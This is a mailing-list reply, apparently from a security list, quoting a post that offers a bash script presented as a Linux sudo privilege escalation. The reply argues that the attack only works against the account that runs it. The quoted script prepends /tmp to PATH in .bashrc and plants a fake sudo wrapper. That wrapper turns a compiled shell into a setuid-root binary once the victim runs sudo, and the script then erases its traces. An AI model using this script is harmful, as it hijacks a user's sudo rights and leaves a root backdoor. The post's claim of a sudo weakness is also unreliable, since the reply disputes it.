Re: Linux Local Privilege Escalation

[Vladimir Marek]

It escapes me how changing your own $PATH makes another user execute
files in /tmp. And if someone has /tmp in $PATH moreover before anything
else (or . for that matter) he deserves it. Right?

-- 
        Vlad

> I written an exploit which allow to became root when a normal user use sudo. 
> The following code add to the .bashrc configuration file the /tmp path. Then 
> when the user exec sudo he runs the fake one, giving you a root shell. Just 
> run it, when the normal user will use sudo you will get a root shell.
> 
> chmod +x ./exploit.sh && ./exploit.sh
> 
> #!/bin/bash
> 
> PAYLOAD="/bin/bash"
> CFILE=".temp0000"
> PRIV="root"
> COLOR='\033[1;31m'
> 
> echo -e "$COLOR"
> 
> echo -e "\n - Adding /tmp path on $HOME/.bashrc"; sleep 1
> echo export PATH=/tmp:$PATH >> $HOME/.bashrc
> echo -e " - Creating C executable with setuid 0 "
> sleep 1
> echo "#include <stdlib.h>" >/tmp/$CFILE.c
> echo "int main(void) {" >>/tmp/$CFILE.c
> echo "setuid(0);" >>/tmp/$CFILE.c
> echo "system(\"$PAYLOAD\"); }" >>/tmp/$CFILE.c
> /usr/bin/gcc /tmp/$CFILE.c -o /tmp/$CFILE &> /dev/null
> rm -rf /tmp/$CFILE.c
> echo -e " - Creating sudo script which will be executed by the victim "; 
> sleep 1
> echo "#!/bin/bash" > /tmp/sudo
> echo "/usr/bin/sudo chown root:root /tmp/$CFILE && /usr/bin/sudo chmod 4755 
> /tmp/$CFILE" >> /tmp/sudo
> echo "/usr/bin/sudo \$1 \$2 \$3 \$4 \$5" >>/tmp/sudo && chmod +x /tmp/sudo
> echo " - Wait while the victim open a shell and execute sudo"
> while [[ $(stat -c '%U' /tmp/$CFILE) != $PRIV ]] ;
> do
> sleep 1
> done
> echo -e " - Root shell with SETUID 0 created on $CFILE"; sleep 1
> echo -e " - Cleaning sudo script and path line\n"; sleep 1
> sed -i -e '/^export PATH/d' $HOME/.bashrc
> rm -rf /tmp/sudo
> /tmp/$CFILE
> 
> Impact
> 
> An attacker logged into a system as normal user, using a sudo weakness, can 
> escalate to root
> 
> Sent with [ProtonMail](https://protonmail.com) Secure Email.